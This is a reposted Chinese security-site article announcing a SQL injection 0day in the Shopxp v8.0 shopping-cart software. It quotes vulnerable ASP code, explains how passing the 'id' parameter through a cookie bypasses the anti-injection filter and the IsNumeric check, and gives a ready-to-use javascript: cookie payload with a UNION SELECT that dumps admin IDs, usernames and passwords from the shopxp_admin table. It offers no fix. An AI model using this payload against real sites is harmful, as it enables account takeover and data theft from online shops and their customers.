获取邀请码  基地首页 | 基地文章 | 基地动画 | 基地软件 | 技术论坛 | 会员学院
 
 
热门搜索:安全 站长培训 网站赚钱 会员培训 CMS建站网 安全
攻防总结免费资源网赚文章网管技巧防火墙技术端口入侵Sniffer嗅探arp技术
DDOS攻防3389攻防灰鸽子文章逆向工程破解实例加密技术脱壳技术溢出漏洞
serv-u漏洞社会工程学渗透技术跨站技术提权技术
 您现在的位置: 新世纪网安基地 >> 文章 >> 业内新闻 >> 漏洞公告 >> 文章正文
Shopxp v8.0 SQL Injection 0day
作者:佚名    文章来源:转载    点击数:    更新时间:2010-2-4

文/My5t3ry 
最近帮朋友看一个站,发现用的是shopxp,就下了shopxp源码回来读了下,发现漏洞不少,下面一起来看看。这套系统使用了早期的枫叶防注系统,只过滤了GET,并且可以绕过,这里不谈绕过的问题了,我们看到 
xplistpl.asp 9-36行代码: 


<table width="100%" border="0" cellspacing="0" cellpadding="0"> 
<tr> 
<td width="88%"><TABLE cellSpacing=0 cellPadding=0 width=100% align=center border=0> 
<TBODY> 
<TR> 
<td width="1" background="img_shopxp/xiao/bgbg.gif"></td> 
<TD class=b vAlign=top align=left><%if IsNumeric(request.QueryString("id"))=False then 
response.write("<script>alert(""非法访问!"");location.href=""index.asp"";</script>") 
response.end 
end if 
dim id 
id=request.QueryString("id") 
if not isinteger(id) then 
response.write"<script>alert(""非法访问!"");location.href=""index.asp"";</script>" 
end if%> 
<table width="100%" align="center" border="0" cellspacing="0" cellpadding="0" class="table-zuoyou" bordercolor="#CCCCCC"> 
<tr> 
<td width="100%" valign="top" bordercolor="#FFFFFF" bgcolor="#FFFFFF" align="center"><table width="100%" border="0" cellspacing="0" cellpadding="4" align="center"> 
<% 
set rs=server.createobject("adodb.recordset") 
rs.open "select * from shopxp_product where shopxpptid="&request("id"),conn,1,3 
if rs.recordcount>0 then 
spmx=rs("shopxpptname") 
end if%> 
<tr> 
<td colspan="3" background="img_shopxp/class_bg.jpg" height=50>  <a href=index.asp><%=webname%></a> >> 商品评论:<%=spmx%></td> 
</tr> 
</table> 


上面这段代码存在逻辑漏洞哦,其中IsNumeric(request.QueryString("id"))=False 这句判断获取的id是否为数字,如果false则停止执行, 
但这里的id是通过request.QueryString获取的,如果我们不给id赋值会怎么样呢?同学们可以通过下面的代码来验证: 

<% 
if IsNumeric(request.QueryString("id"))=False then 
response.write("<script>alert(""非法访问!"");location.href=""index.asp"";</script>") 
response.end 
end if 
response.write("my5t3ry") 
%> 


保存为test.asp,然后直接访问test.asp,看是否打印my5t3ry? 如果不用过request.QueryString给id赋值, 
而是通过,request.form或者request.cookies给id赋值是可以直接绕过他的判断的,代码不会停止执行,然后进入 
sql查询用的是request("id"),学过asp的同学都知道request通吃get,post,cookie的,到这里就成功bypass防注和IsNumeric函数的判断。 

exploit: 
用Firefox访问目标站,使用Firefox的插件noscript禁用该站javascript 
然后清空地址栏,输入: 
javascript:alert(document.cookie="id=" + escape("1 union select 1,cstr(adminid)&chr(124)&admin&chr(124)&password,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 from shopxp_admin"));location.href="/xplistpl.asp"; 

Ps:如果商品评论后面没有显示,多半是字段数步对造成的 
『关闭该页』 『打印该页』

  • 上一篇文章:
    		• 责任编辑:Wangtianxiang 
  • 下一篇文章:
    • 最近更新
    推荐文章公益讲座:,全面提升网
    推荐文章站长讲座第5期-站长快
    推荐文章高效学习 成就未来富站
    推荐文章全面提高执行力,让网络
    推荐文章服务器超级隐藏账户的
    推荐文章小黑哥:月收入3000的
    推荐文章黑客横行,教你设个陷阱
    推荐文章批处理学习完全教程
    推荐文章安全技巧:检查自己的
    推荐文章多种方法:揪出隐藏在电
    热门文章
    普通文章asp记录管理员账号密码
    普通文章DZ7.1 and 7.2 0远程代
    普通文章破解qq2009聊天记录ms
    普通文章跑跑卡丁车利用金山网
    普通文章网友和黑客都最爱“1
    普通文章干掉360的两种方法
    普通文章五种有效的淘宝客推广
    普通文章百度被黑原理,图解
    固顶文章活动:终身会员打折疯狂
    普通文章黑鹰科技公司开办黑客
    相关文章
    互联网五大灾难:IT的世
    移动安全:十大Wi-Fi网络
    黑客也商业 恶意软件加上
    鬼影作者高调现身 金山发
    如何测试XSS漏洞
    最新IE 0day漏洞Metaspl
    阿里巴巴或牵手eBay支付
    无ARP欺骗的嗅探技术
    SouthidcEditor利用方法
    渗透中另一种抓系统密码
    盛大文学起诉百度侵权已
    Hitwise:Facebook成美国
    域名维权3·15 域名的合
    关闭社会网吧提案使品牌
    为黑客大开后门 劲量充电
    两黑客入侵网络游戏获利
    电子商务中物流信息安全
    360杀毒评测:杀毒状元大
    Google将关闭中国搜索引
    地区小站日流量500IP 也
    关于我们 | 加入会员 | 网安商城 | 投稿方法 | 广告报价| 友情连接 | 网站地图 | 网安论坛网安招聘 |站长
    加入会员咨询QQ:65444425 投稿方法与教程欺骗错误举报QQ:21611201 广告与合作QQ:9324223

    浙ICP备06031184号